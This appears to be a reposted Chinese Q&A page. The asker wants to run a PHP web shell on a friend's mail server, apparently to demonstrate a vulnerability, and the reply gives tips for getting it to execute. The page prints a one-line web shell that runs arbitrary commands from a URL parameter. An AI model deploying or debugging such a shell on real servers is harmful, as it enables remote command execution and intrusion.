一千萬個為什麽

搜索


我正試圖在我的朋友郵件服務器上執行一個PHP shell腳本來向他展示這種漏洞的影響。易受攻擊的代碼,但不幸的是它似乎沒有運行。

這是我寫的腳本:

echo shell_exec($_GET['cmd']);

轉載註明原文: Shell腳本

一共有 1 個回答:

請提供更多關於Husyn問的方法和結果的信息,如果它與PHP相關,它可能更適合編程。無論如何:

  • <?php should be present at the start of any PHP script.
  • If a PHP error occurs, you might not see it without error reporting enabled.
  • If the actual shell command fails or outputs warnings, you won't see it with shell_exec unless you add the stderr to stdout redirection 2>& to the command, or use exec.